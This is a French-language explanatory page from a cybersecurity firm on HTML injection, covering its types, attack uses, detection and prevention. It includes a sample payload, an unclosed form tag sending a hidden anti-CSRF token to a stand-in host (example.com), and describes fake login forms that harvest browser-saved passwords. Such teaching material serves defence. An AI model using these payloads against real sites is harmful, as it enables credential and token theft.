Injection HTML

Qu’est-ce que l’injection HTML ?

L’injection HTML est une vulnérabilité Web qui permet à un attaquant d’injecter du contenu HTML malveillant dans le code HTML légitime d’une application Web. Les injections HTML sont très similaires au cross-site scripting (XSS) – la livraison est exactement la même, mais le contenu injecté est de pures balises HTML, pas un script. Les injections HTML sont moins dangereuses que XSS mais peuvent toujours être utilisées à des fins malveillantes.

---

Gravité:		grave dans de rares circonstances
Prévalence:		découvert rarement
Portée:		sites et applications web
Impact technique :		HTML malveillant exécuté dans le navigateur
Conséquences dans le pire des cas :		violation d’informations sensibles, contrôle de l’application web
Solution rapide:		filtrage et encodage des entrées utilisateur

---

Comment fonctionne l’injection HTML ?

Tout comme les scripts intersites, une injection HTML se produit lorsqu’un utilisateur malveillant fournit une charge utile (le plus souvent du code HTML, rarement du CSS) dans le cadre d’une entrée non fiable, et que le navigateur Web l’exécute dans le cadre du langage de balisage hypertexte du Web vulnérable. page. Les attaques par injection HTML ciblent uniquement le client et, tout comme les attaques XSS, elles affectent l’utilisateur, pas le serveur.

Il existe deux principaux types d’injection HTML : réfléchi et stocké , similaire au XSS réfléchi et au XSS stocké :

• Dans une injection HTML réfléchie, la charge utile doit être livrée à chaque utilisateur individuellement (généralement sous la forme d’un lien malveillant) et devient une partie de la requête.
• Dans une injection HTML stockée, la charge utile est stockée par le serveur Web et livrée ultérieurement, potentiellement à plusieurs utilisateurs.

La principale différence entre les injections HTML et XSS est l’étendue des capacités de l’attaquant. En raison de la nature déclarative du contenu HTML, la charge utile peut accomplir beaucoup moins que dans le cas du code JavaScript. Cela rend les injections HTML beaucoup moins susceptibles d’être utilisées pour les attaques de phishing.

Exemples d’attaques par injection HTML

Les attaquants peuvent utiliser des injections HTML à plusieurs fins. Voici quelques-unes des utilisations les plus courantes de cette technique d’attaque, ainsi que les conséquences potentielles pour la sécurité des applications Web.

Défigurer

L’utilisation la plus simple de l’injection HTML est le défigurage, c’est-à-dire la modification du contenu visible de la page. Par exemple, un attaquant peut utiliser une injection HTML stockée pour injecter une publicité visuelle d’un produit qu’il souhaite vendre. L’attaquant peut également injecter du code HTML malveillant visant à nuire à la réputation de la page, par exemple pour des raisons politiques ou personnelles.

Dans ces deux cas, le contenu injecté vise à ressembler à une partie légitime de la page HTML. Et dans les deux cas, une vulnérabilité d’injection HTML stockée devrait être exploitée par l’attaquant.

Exfiltrer les données sensibles des utilisateurs

Une autre utilisation courante de l’injection HTML consiste à créer un formulaire sur la page cible et à inciter l’utilisateur à saisir des données sensibles dans ce formulaire. Par exemple, un attaquant peut injecter un code malveillant qui affiche un faux formulaire de connexion. Les données du formulaire (login et mot de passe) seraient alors envoyées à un serveur contrôlé par l’attaquant.

Si la page Web utilise des URL relatives, l’attaquant peut également tenter d’utiliser la balise pour détourner des données. Par exemple, s’ils injectent et que la page Web utilise des URL relatives pour la soumission de formulaires, tous les formulaires seront envoyés au site example.com contrôlé par l’attaquant à la place.

L’attaquant peut également détourner des formulaires HTML valides en injectant une balise

supplémentaire avant une balise légitime . Les balises de formulaire ne peuvent pas être imbriquées, la balise de niveau supérieur est donc celle qui a priorité.

Dans tous ces cas, les attaquants peuvent aussi bien utiliser l’injection HTML réfléchie que l’injection HTML stockée.

Exfiltrer des jetons anti-CSRF

Les attaquants peuvent également utiliser l’injection HTML pour exfiltrer les jetons anti-CSRF en vue d’une attaque CSRF (cross-site request forgery) ultérieure . Les jetons anti-CSRF sont généralement livrés à l’aide du type d’entrée masqué dans un formulaire.

Pour exfiltrer le jeton, un attaquant peut, par exemple, utiliser une balise non terminée avec des guillemets simples comme <input type="hidden" name="anti_xsrf" value="eW91J3JlIGN1cmlvdXMsIGFyZW4ndCB5b3U/">

Une autre option consiste à injecter une balise </span></em><span> . Dans ce cas, tout le contenu après la balise </span><em><span><textarea></span></em><span> sera soumis, et les balises </span><em><span><textarea></span></em><span> et </span><em><span><form></span></em><span> seront implicitement fermées. Pour que cette attaque fonctionne, cependant, l’utilisateur doit être amené à soumettre le formulaire manuellement :</span></p><div class="code-toolbar"><pre class="wp-block-code is-style-code-highlighter line-numbers language-html" tabindex="0"><code class="language-html"><span class="token tag"><span class="token punctuation"><</span>form <span class="token attr-name">action</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>http://example.com/record.php?<span class="token punctuation">'</span></span><span class="token attr-name"><textarea</span><span class="token punctuation">></span></span><span class="token tag"><span class="token punctuation"><</span>input <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>hidden<span class="token punctuation">"</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>anti_xsrf<span class="token punctuation">"</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>eW91J3JlIGN1cmlvdXMsIGFyZW4ndCB5b3U/<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></code></pre></div><div class="toolbar"><div class="toolbar-item"> </div></div><h3><span>Exfiltrer les mots de passe stockés dans le navigateur</span></h3><p><span>Les injections HTML peuvent également être utilisées par les attaquants pour insérer des formulaires qui seront automatiquement remplis par les gestionnaires de mots de passe des navigateurs. Si l’attaquant parvient à injecter un formulaire approprié, le gestionnaire de mots de passe fournira automatiquement les informations d’identification de l’utilisateur. Pour de nombreux navigateurs, le formulaire n’a besoin que des noms et de la structure de champ d’entrée appropriés, et son paramètre </span><em><span>d’action</span></em><span> peut pointer vers n’importe quel hôte.</span></p><h2><span>Conséquences potentielles d’une attaque par injection HTML</span></h2><p><span>Les vulnérabilités d’injection HTML sont généralement sous-estimées. S’il est vrai qu’elles n’affectent pas directement le serveur Web ou la base de données, les injections HTML peuvent avoir de graves conséquences telles que les suivantes :</span></p><ul><li><span>L’attaquant pourrait utiliser un faux formulaire pour exfiltrer les données de mot de passe stockées dans le navigateur ou inciter un utilisateur à fournir ses identifiants de connexion. Si l’utilisateur ciblé dispose de privilèges administratifs, des acteurs malveillants pourraient obtenir un accès administratif à l’application Web.</span></li><li><span>L’attaquant pourrait gravement nuire à la réputation de votre entreprise, de votre institution ou même de votre pays en effectuant une attaque clairement visible pour le public. Si une page de grande valeur est dégradée ou utilisée pour diffuser de la désinformation, vos utilisateurs ou clients pourraient prendre de mauvaises décisions et perdre confiance dans vos pratiques de cybersécurité.</span></li><li><span>L’attaquant pourrait utiliser l’injection HTML comme outil pour passer à d’autres attaques, telles que CSRF.</span></li></ul><p><span>Il existe de nombreuses autres utilisations potentielles des injections HTML. Pour en savoir plus, nous vous recommandons de lire un excellent </span><a href="https://translate.google.com/website?sl=auto&tl=fr&hl=fr&u=http://lcamtuf.coredump.cx/postxss/" target="_blank" rel="noreferrer noopener"><span>aide-mémoire de Michal Zalewski (lcamtuf</span></a><span> ). Cependant, même les utilisations mentionnées ci-dessus devraient suffire à montrer que si l’injection HTML n’est peut-être pas aussi dangereuse que, par exemple, l’ </span><span>injection SQL</span><span> , vous ne devez pas ignorer ce type d’attaque.</span></p><h2 id="detect"><span>Comment détecter les vulnérabilités d’injection HTML ?</span></h2><p><span>La meilleure façon de détecter les vulnérabilités d’injection HTML varie selon qu’elles sont déjà connues ou inconnues.</span></p><ul><li><span>Si vous utilisez uniquement des applications Web commerciales ou open source et que vous ne développez pas vos propres applications Web, il peut suffire d’identifier la version exacte de l’application que vous utilisez. Si la version identifiée est sensible à l’injection HTML, vous pouvez supposer que votre site Web est vulnérable. Vous pouvez identifier la version manuellement ou utiliser un outil de sécurité approprié, tel qu’une solution </span><span>d’analyse de la composition logicielle (SCA)</span><span> .</span><span>Si vous développez vos propres applications Web ou si vous souhaitez avoir la possibilité de trouver des vulnérabilités d’injection HTML jusque-là inconnues (jours zéro) dans des applications connues, vous devez être en mesure d’exploiter avec succès la vulnérabilité d’injection HTML pour être certain qu’elle existe. Cela nécessite soit d’effectuer un pentesting manuel avec l’aide de chercheurs en sécurité, soit d’utiliser un outil de test de sécurité (scanner) qui peut utiliser l’automatisation pour exploiter les vulnérabilités Web. </span></li></ul><h2 id="prevent"><span>Comment prévenir les vulnérabilités d’injection HTML ?</span></h2><p><span>Comme pour la plupart des types d’injections, empêcher les injections HTML nécessite une validation des entrées. Lorsque vous empêchez les injections HTML, vous devez suivre les mêmes principes et méthodes que pour </span><span>empêcher les scripts intersites</span><span> . Tout comme pour XSS, vous pouvez essayer de filtrer tout contenu HTML de l’entrée (mais rappelez-vous que </span><span>de nombreuses astuces peuvent être utilisées pour échapper aux filtres</span><span> ) ou vous pouvez échapper toutes les balises HTML.</span></p><p><span>Bien que la deuxième approche soit beaucoup plus efficace, elle peut être délicate à mettre en œuvre si du code HTML est autorisé dans la saisie utilisateur par conception (par exemple, pour fournir des extraits de code). Dans de tels cas, un filtrage strict des entrées basé sur des listes blanches est recommandé.</span></p><h2 id="mitigate"><span>Comment atténuer les attaques par injection HTML ?</span></h2><p><span>Pour atténuer temporairement les vulnérabilités d’injection HTML lorsqu’un correctif est en attente, vous pouvez utiliser les règles </span><span>WAF (pare-feu d’application Web)</span><span> . Avec de telles règles, les utilisateurs ne pourront pas fournir d’entrées malveillantes à votre application Web, de sorte qu’aucun code HTML malveillant ne s’exécutera dans leurs navigateurs. Cependant, étant donné que les pare-feu d’applications Web ne comprennent pas le contexte de votre application, ces règles peuvent être contournées par des attaquants et ne doivent jamais être traitées comme une solution permanente.</span></p><p><span>Une poignée d’attaques par injection HTML, telles que l’ injection HTML de la balise </span><em><span><base></span></em><span> , peuvent également être bloquées à l’aide d’une politique de sécurité du contenu (CSP) appropriée sur votre serveur Web, mais cela ne couvre que quelques cas. Par conséquent, bien que vous puissiez compter sur les en-têtes CSP pour vous protéger contre de nombreux types de XSS, vous ne devez pas vous fier à eux pour vous protéger contre l’injection HTML.</span></p></div></div></div></div></div></section><section class="elementor-section elementor-top-section elementor-element elementor-element-4a078ebc pbmit-col-stretched-none pbmit-bg-color-over-image elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="4a078ebc" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-54cf6fa8 pbmit-bg-color-over-image" data-id="54cf6fa8" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-dc21f5c elementor-widget elementor-widget-toggle" data-id="dc21f5c" data-element_type="widget" data-widget_type="toggle.default"><div class="elementor-widget-container"><style>/*! elementor - v3.20.0 - 20-03-2024 */ .elementor-toggle{text-align:left}.elementor-toggle .elementor-tab-title{font-weight:700;line-height:1;margin:0;padding:15px;border-bottom:1px solid #d5d8dc;cursor:pointer;outline:none}.elementor-toggle .elementor-tab-title .elementor-toggle-icon{display:inline-block;width:1em}.elementor-toggle .elementor-tab-title .elementor-toggle-icon svg{margin-inline-start:-5px;width:1em;height:1em}.elementor-toggle .elementor-tab-title .elementor-toggle-icon.elementor-toggle-icon-right{float:right;text-align:right}.elementor-toggle .elementor-tab-title .elementor-toggle-icon.elementor-toggle-icon-left{float:left;text-align:left}.elementor-toggle .elementor-tab-title .elementor-toggle-icon .elementor-toggle-icon-closed{display:block}.elementor-toggle .elementor-tab-title .elementor-toggle-icon .elementor-toggle-icon-opened{display:none}.elementor-toggle .elementor-tab-title.elementor-active{border-bottom:none}.elementor-toggle .elementor-tab-title.elementor-active .elementor-toggle-icon-closed{display:none}.elementor-toggle .elementor-tab-title.elementor-active .elementor-toggle-icon-opened{display:block}.elementor-toggle .elementor-tab-content{padding:15px;border-bottom:1px solid #d5d8dc;display:none}@media (max-width:767px){.elementor-toggle .elementor-tab-title{padding:12px}.elementor-toggle .elementor-tab-content{padding:12px 10px}}.e-con-inner>.elementor-widget-toggle,.e-con>.elementor-widget-toggle{width:var(--container-widget-width);--flex-grow:var(--container-widget-flex-grow)}</style><div class="elementor-toggle"><div class="elementor-toggle-item"><div id="elementor-tab-title-2301" class="elementor-tab-title" data-tab="1" role="button" aria-controls="elementor-tab-content-2301" aria-expanded="false"> <span class="elementor-toggle-icon elementor-toggle-icon-left" aria-hidden="true"> <span class="elementor-toggle-icon-closed"><svg class="e-font-icon-svg e-fas-caret-right" viewBox="0 0 192 512" xmlns="http://www.w3.org/2000/svg"><path d="M0 384.662V127.338c0-17.818 21.543-26.741 34.142-14.142l128.662 128.662c7.81 7.81 7.81 20.474 0 28.284L34.142 398.804C21.543 411.404 0 402.48 0 384.662z"></path></svg></span> <span class="elementor-toggle-icon-opened"><svg class="elementor-toggle-icon-opened e-font-icon-svg e-fas-caret-up" viewBox="0 0 320 512" xmlns="http://www.w3.org/2000/svg"><path d="M288.662 352H31.338c-17.818 0-26.741-21.543-14.142-34.142l128.662-128.662c7.81-7.81 20.474-7.81 28.284 0l128.662 128.662c12.6 12.599 3.676 34.142-14.142 34.142z"></path></svg></span> </span> <a class="elementor-toggle-title" tabindex="0">Qu'est-ce que l'injection HTML ?</a></div><div id="elementor-tab-content-2301" class="elementor-tab-content elementor-clearfix" data-tab="1" role="region" aria-labelledby="elementor-tab-title-2301"><p><span><span class="">Dans une attaque par injection HTML, un attaquant injecte du code HTML malveillant dans le code HTML légitime d’une application Web. </span>Les injections HTML sont très similaires au cross-site scripting (XSS) – la livraison est exactement la même, mais le contenu injecté est de pures balises HTML</span></p></div></div><div class="elementor-toggle-item"><div id="elementor-tab-title-2302" class="elementor-tab-title" data-tab="2" role="button" aria-controls="elementor-tab-content-2302" aria-expanded="false"> <span class="elementor-toggle-icon elementor-toggle-icon-left" aria-hidden="true"> <span class="elementor-toggle-icon-closed"><svg class="e-font-icon-svg e-fas-caret-right" viewBox="0 0 192 512" xmlns="http://www.w3.org/2000/svg"><path d="M0 384.662V127.338c0-17.818 21.543-26.741 34.142-14.142l128.662 128.662c7.81 7.81 7.81 20.474 0 28.284L34.142 398.804C21.543 411.404 0 402.48 0 384.662z"></path></svg></span> <span class="elementor-toggle-icon-opened"><svg class="elementor-toggle-icon-opened e-font-icon-svg e-fas-caret-up" viewBox="0 0 320 512" xmlns="http://www.w3.org/2000/svg"><path d="M288.662 352H31.338c-17.818 0-26.741-21.543-14.142-34.142l128.662-128.662c7.81-7.81 20.474-7.81 28.284 0l128.662 128.662c12.6 12.599 3.676 34.142-14.142 34.142z"></path></svg></span> </span> <a class="elementor-toggle-title" tabindex="0">À quel point l'injection HTML est-elle dangereuse ?</a></div><div id="elementor-tab-content-2302" class="elementor-tab-content elementor-clearfix" data-tab="2" role="region" aria-labelledby="elementor-tab-title-2302"><p><span>Les vulnérabilités d’injection HTML sont généralement sous-estimées. S’il est vrai qu’elles n’affectent pas directement le serveur Web ou la base de données, les injections HTML peuvent avoir de graves conséquences telles que l’exfiltration de mots de passe, des atteintes à la réputation ou des attaques CSRF.</span></p></div></div><div class="elementor-toggle-item"><div id="elementor-tab-title-2303" class="elementor-tab-title" data-tab="3" role="button" aria-controls="elementor-tab-content-2303" aria-expanded="false"> <span class="elementor-toggle-icon elementor-toggle-icon-left" aria-hidden="true"> <span class="elementor-toggle-icon-closed"><svg class="e-font-icon-svg e-fas-caret-right" viewBox="0 0 192 512" xmlns="http://www.w3.org/2000/svg"><path d="M0 384.662V127.338c0-17.818 21.543-26.741 34.142-14.142l128.662 128.662c7.81 7.81 7.81 20.474 0 28.284L34.142 398.804C21.543 411.404 0 402.48 0 384.662z"></path></svg></span> <span class="elementor-toggle-icon-opened"><svg class="elementor-toggle-icon-opened e-font-icon-svg e-fas-caret-up" viewBox="0 0 320 512" xmlns="http://www.w3.org/2000/svg"><path d="M288.662 352H31.338c-17.818 0-26.741-21.543-14.142-34.142l128.662-128.662c7.81-7.81 20.474-7.81 28.284 0l128.662 128.662c12.6 12.599 3.676 34.142-14.142 34.142z"></path></svg></span> </span> <a class="elementor-toggle-title" tabindex="0">Comment prévenir les attaques par injection HTML ?</a></div><div id="elementor-tab-content-2303" class="elementor-tab-content elementor-clearfix" data-tab="3" role="region" aria-labelledby="elementor-tab-title-2303"><p><span><span class="">La prévention des injections HTML nécessite une validation des entrées. </span>Lorsque vous empêchez les injections HTML, vous devez suivre les mêmes principes et méthodes que pour empêcher les scripts intersites.</span></p></div></div></div></div></div><div class="elementor-element elementor-element-296113f5 elementor-widget elementor-widget-text-editor" data-id="296113f5" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><table><thead><tr><th><span>Classification</span></th><th><span>IDENTIFIANT</span></th></tr></thead><tbody><tr><td><span>CAPEC</span></td><td><span>18/148</span></td></tr><tr><td><span>CWE</span></td><td><span>79</span></td></tr><tr><td><span>WASC</span></td><td><span>12/22</span></td></tr><tr><td><span>OWASP 2021</span></td><td><span>A3</span></td></tr></tbody></table></div></div></div></div></div></section><section class="elementor-section elementor-top-section elementor-element elementor-element-79337c75 pbmit-col-stretched-none pbmit-bg-color-over-image elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="79337c75" data-element_type="section"><div class="elementor-container elementor-column-gap-default"><div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-641dc2e8 pbmit-bg-color-over-image" data-id="641dc2e8" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-2d7d7689 pbmit-align-left elementor-widget elementor-widget-pbmit_service_element" data-id="2d7d7689" data-element_type="widget" data-widget_type="pbmit_service_element.default"><div class="elementor-widget-container"><div class="pbminfotech-element pbminfotech-element-service pbmit-element-service-style-9 pbmit-element-viewtype-row-column pbminfotech-gap-15px pbmit-infinite-scroll-no pbmit-infinite-scroll-button-no" data-cpt="service" data-totalpagination="2" data-style="9" data-show="6" data-columns="3" data-loop="false" data-autoplay="false" data-center="false" data-nav="false" data-dots="false" data-reverse="false" data-autoplayspeed="1000" data-margin="15px"><div class="pbmit-element-inner"><div class="pbmit-infinite-scroll-data">{"cpt":"service","style":"9","columns":"3","show":"6","order":"DESC","orderby":"DESC"}</div><div class="pbmit-ele-header-area"><div class="pbmit-heading-subheading pbmit-heading-subheading-style-1 left-align "><h2 class="pbmit-element-title"> Nos Services en Cybersécurité</h2><h4 class="pbmit-element-subtitle"><span> </span> Protégez-vous maintenant !</h4></div></div><div class="pbmit-element-posts-wrapper "><div class="swiper-wrapper row multi-columns-row"><article class="pbmit-ele pbmit-ele-service pbmit-service-style-9 col-md-4 forfaits "><div class="pbminfotech-post-item"><div class="pbmit-service-icon-wrapper"> <i class="pbmit-xido-icon pbmit-xido-icon-website"></i></div><div class="pbminfotech-box-content"><h3 class="pbmit-service-title"><a href="https://cycuri.com/service/forfait-evaluation-de-la-surface-dattaque/">Forfait Évaluation de la surface d’attaque</a></h3><div class="pbmit-service-content"><p>La cible de cette évaluation de la surface d’attaque est les ressources réseau, les systèmes et les terminaux. Il n’y a pas de ciblage des membres ou des employés des organisations à des fins d’ingénierie sociale.</p></div></div></div></article><article class="pbmit-ele pbmit-ele-service pbmit-service-style-9 col-md-4 forfaits "><div class="pbminfotech-post-item"><div class="pbmit-service-icon-wrapper"> <i class="pbmit-xido-icon pbmit-xido-cyber-icon pbmit-xido-icon pbmit-xido-cyber-icon-global"></i></div><div class="pbminfotech-box-content"><h3 class="pbmit-service-title"><a href="https://cycuri.com/service/forfait-evaluation-de-la-vulnerabilite/">Forfait Évaluation de la vulnérabilité</a></h3><div class="pbmit-service-content"><p>Nous sommes en mesure de fournir des évaluations de vulnérabilité des applications web , des serveurs connectés à Internet et des gammes de réseaux connectés à Internet .</p></div></div></div></article><article class="pbmit-ele pbmit-ele-service pbmit-service-style-9 col-md-4 services-a-la-carte "><div class="pbminfotech-post-item"><div class="pbmit-service-icon-wrapper"> <i class="pbmit-xido-icon pbmit-xido-cyber-icon pbmit-xido-icon pbmit-xido-cyber-icon-cloud-1"></i></div><div class="pbminfotech-box-content"><h3 class="pbmit-service-title"><a href="https://cycuri.com/service/analyse-de-vulnerabilite/">Analyse de vulnérabilité</a></h3><div class="pbmit-service-content"><p>Cycuri propose des analyses de vulnérabilité ponctuelles ou régulières de votre périmètre externe, de vos applications Web ou de votre réseau interne.</p></div></div></div></article><article class="pbmit-ele pbmit-ele-service pbmit-service-style-9 col-md-4 forfaits "><div class="pbminfotech-post-item"><div class="pbmit-service-icon-wrapper"> <i class="pbmit-xido-icon pbmit-xido-cyber-icon pbmit-xido-icon pbmit-xido-cyber-icon-shield-1"></i></div><div class="pbminfotech-box-content"><h3 class="pbmit-service-title"><a href="https://cycuri.com/service/forfait-evaluation-wordpress/">Forfait Évaluation WordPress</a></h3><div class="pbmit-service-content"><p>Nos services d’évaluation WordPress professionnelle sont populaires auprès de tous ceux qui souhaitent un examen par un tiers indépendant de leur posture de sécurité.</p></div></div></div></article><article class="pbmit-ele pbmit-ele-service pbmit-service-style-9 col-md-4 services-a-la-carte "><div class="pbminfotech-post-item"><div class="pbmit-service-icon-wrapper"> <i class="pbmit-xido-icon pbmit-xido-icon-website"></i></div><div class="pbminfotech-box-content"><h3 class="pbmit-service-title"><a href="https://cycuri.com/service/test-intrusion-application-web/">Test d’intrusion d’application Web</a></h3><div class="pbmit-service-content"><p>Que votre application Web soit destinée aux employés, B2B ou B2C, il existe un niveau de confiance inhérent qui est supposé lorsque les utilisateurs sont autorisés à entrer, naviguer et utiliser des applications et/ou des portails d’applications.</p></div></div></div></article><article class="pbmit-ele pbmit-ele-service pbmit-service-style-9 col-md-4 services-a-la-carte "><div class="pbminfotech-post-item"><div class="pbmit-service-icon-wrapper"> <i class="pbmit-xido-icon pbmit-xido-icon-investment"></i></div><div class="pbminfotech-box-content"><h3 class="pbmit-service-title"><a href="https://cycuri.com/service/test-intrusion-black-box-externe/">Test d’intrusion Black-Box externe</a></h3><div class="pbmit-service-content"><p>Un test d’intrusion externe Black-Box imite les actions d’un adversaire réel en tentant d’exploiter les faiblesses de la sécurité du réseau sans les dangers d’une menace réelle.</p></div></div></div></article></div></div></div></div></div></div></div></div></div></section></div><h3 class="pbmit-hide">Injection HTML</h3></div></div></main></div></div></div><footer id="colophon" class="pbmit-footer-section site-footer pbmit-footer-style-3 pbmit-text-color-white pbmit-bg-color-blackish pbmit-bg-image-yes pbmit-footer-menu-yes pbmit-footer-widget-yes"><div class="pbmit-footer-section pbmit-footer-big-area-wrapper pbmit-bg-color-transparent"><div class="footer-wrap pbmit-footer-big-area"><div class="container"><div class="row"><div class="col-md-9 col-sm-12"><h3 class="pbmit-footer-big-title">Choisissez des services de test d'intrusion indépendants pour obtenir des conseils d'experts de la sécurité offensive et réduire votre exposition aux cyberattaques.</h3></div><div class="col-md-3 col-sm-12"><div class="pbmit-footer-logo"> <img loading="lazy" class="pbmit-main-logo" src="https://xido-demo.pbminfotech.com/cybersecurity/wp-content/uploads/sites/28/2022/10/cybersecurity-logo-white.svg" alt="Cycuri - Services en Cybersécurité" title="Cycuri - Services en Cybersécurité" /></div></div></div></div></div></div><div class="pbmit-footer-section footer-wrap pbmit-footer-widget-area pbmit-bg-color-transparent"><div class="container"><div class="row"><div class="pbmit-footer-widget pbmit-footer-widget-col-1 col-md-2"></div><div class="pbmit-footer-widget pbmit-footer-widget-col-2 col-md-2"><aside id="nav_menu-2" class="widget-odd widget-last widget-first widget-1 widget widget_nav_menu"><h2 class="widget-title">Notre Entreprise</h2><div class="menu-menu-footer-container"><ul id="menu-menu-footer" class="menu"><li id="menu-item-253" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-253"><a href="https://cycuri.com/contact-us/">Contactez-nous</a></li><li id="menu-item-254" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-254"><a href="https://cycuri.com/faq/">FAQ</a></li><li id="menu-item-256" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-256"><a href="#">Carrières</a></li><li id="menu-item-257" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-257"><a href="https://cycuri.com/about-us/">À propos de nous</a></li><li id="menu-item-260" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-260"><a href="https://cycuri.com/blog-cybersecurite/">Notre Blog</a></li></ul></div></aside></div><div class="pbmit-footer-widget pbmit-footer-widget-col-4 col-md-6"><aside id="text-2" class="widget-odd widget-first widget-1 widget widget_text"><h2 class="widget-title">Restez en contact</h2><div class="textwidget"><script>(function() { window.mc4wp = window.mc4wp || { listeners: [], forms: { on: function(evt, cb) { window.mc4wp.listeners.push( { event : evt, callback: cb } ); } } } })();</script><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-206" method="post" data-id="206" data-name="Mailchimp" ><div class="mc4wp-form-fields"><div class="pbmit-footer-newsletter"> <input type="email" name="EMAIL" placeholder="Recevez des news & mises à jour" required /> <button type="submit" value="Sign up"><i class="pbmit-base-icon-arroba"></i></button></div> Notre expertise, à votre service, dans le domaine de la cyber sécurité.</div><label style="display: none !important;">Laissez ce champ vide si vous êtes humain : <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1710999129" /><input type="hidden" name="_mc4wp_form_id" value="206" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form></div></aside><aside id="text-3" class="widget-even widget-last widget-2 widget widget_text"><div class="textwidget"><ul class="pbmit-social-links"><li class="pbmit-social-li pbmit-social-facebook "><a href="#" target="_blank" rel="noopener"><span><i class="pbmit-base-icon-facebook-squared"></i></span></a></li><li class="pbmit-social-li pbmit-social-twitter "><a href="#" target="_blank" rel="noopener"><span><i class="pbmit-base-icon-twitter"></i></span></a></li><li class="pbmit-social-li pbmit-social-instagram "><a href="#" target="_blank" rel="noopener"><span><i class="pbmit-base-icon-instagram"></i></span></a></li><li class="pbmit-social-li pbmit-social-youtube "><a href="#" target="_blank" rel="noopener"><span><i class="pbmit-base-icon-youtube-play"></i></span></a></li></ul></div></aside></div></div></div></div><div class="pbmit-footer-section pbmit-footer-text-area pbmit-bg-color-transparent"><div class="container"><div class="pbmit-footer-text-inner"><div class="row"><div class="col-md-6"><div class="pbmit-footer-copyright-text-area"> Copyright © 2024 <a href="https://cycuri.com/">Cycuri - Services en Cybersécurité</a>, All Rights Reserved.</div></div><div class="col-md-6"><div class=" pbmit-footer-menu-area"><div class="menu-copyright-menu-container"><ul class="pbmit-footer-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-266"><a rel="privacy-policy" href="https://cycuri.com/politique-de-confidentialite/">Politique de confidentialité</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-267"><a href="https://cycuri.com/contact-us/">Contact</a></li></ul></div></div></div></div></div></div></div></footer></div></div> <a href="#" class="scroll-to-top"><i class="pbmit-base-icon-up-open-big"></i></a> <script>(function() {function maybePrefixUrlField () { const value = this.value.trim() if (value !== '' && value.indexOf('http') !== 0) { this.value = 'http://' + value } } const urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]') for (let j = 0; j < urlFields.length; j++) { urlFields[j].addEventListener('blur', maybePrefixUrlField) } })();</script> <script>const lazyloadRunObserver = () => { const dataAttribute = 'data-e-bg-lazyload'; const lazyloadBackgrounds = document.querySelectorAll( `[${ dataAttribute }]:not(.lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; const lazyloadSelector = lazyloadBackground.getAttribute( dataAttribute ); if ( lazyloadSelector ) { lazyloadBackground = entry.target.querySelector( lazyloadSelector ); } if( lazyloadBackground ) { lazyloadBackground.classList.add( 'lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '100px 0px 100px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } );</script> <script src="https://cycuri.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.2" id="swv-js"></script> <script id="contact-form-7-js-extra">var wpcf7 = {"api":{"root":"https:\/\/cycuri.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":"1"};</script> <script src="https://cycuri.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.2" id="contact-form-7-js"></script> <script src="https://cycuri.com/wp-content/plugins/breeze/assets/js/js-front-end/breeze-lazy-load.min.js?ver=2.1.6" id="breeze-lazy-js"></script> <script src="https://cycuri.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2" id="hoverIntent-js"></script> <script id="megamenu-js-extra">var megamenu = {"timeout":"300","interval":"100"};</script> <script src="https://cycuri.com/wp-content/plugins/megamenu/js/maxmegamenu.js?ver=3.3.1" id="megamenu-js"></script> <script defer src="https://cycuri.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=4.9.11" id="mc4wp-forms-api-js"></script> <script src="https://cycuri.com/wp-content/plugins/jetsticky-for-elementor/assets/js/lib/ResizeSensor.min.js?ver=1.7.0" id="jet-resize-sensor-js"></script> <script src="https://cycuri.com/wp-content/plugins/jetsticky-for-elementor/assets/js/lib/sticky-sidebar/sticky-sidebar.min.js?ver=3.3.1" id="jet-sticky-sidebar-js"></script> <script src="https://cycuri.com/wp-content/plugins/jetsticky-for-elementor/assets/js/lib/jsticky/jquery.jsticky.js?ver=1.1.0" id="jsticky-js"></script> <script src="https://cycuri.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.20.1" id="elementor-pro-webpack-runtime-js"></script> <script src="https://cycuri.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.20.2" id="elementor-webpack-runtime-js"></script> <script 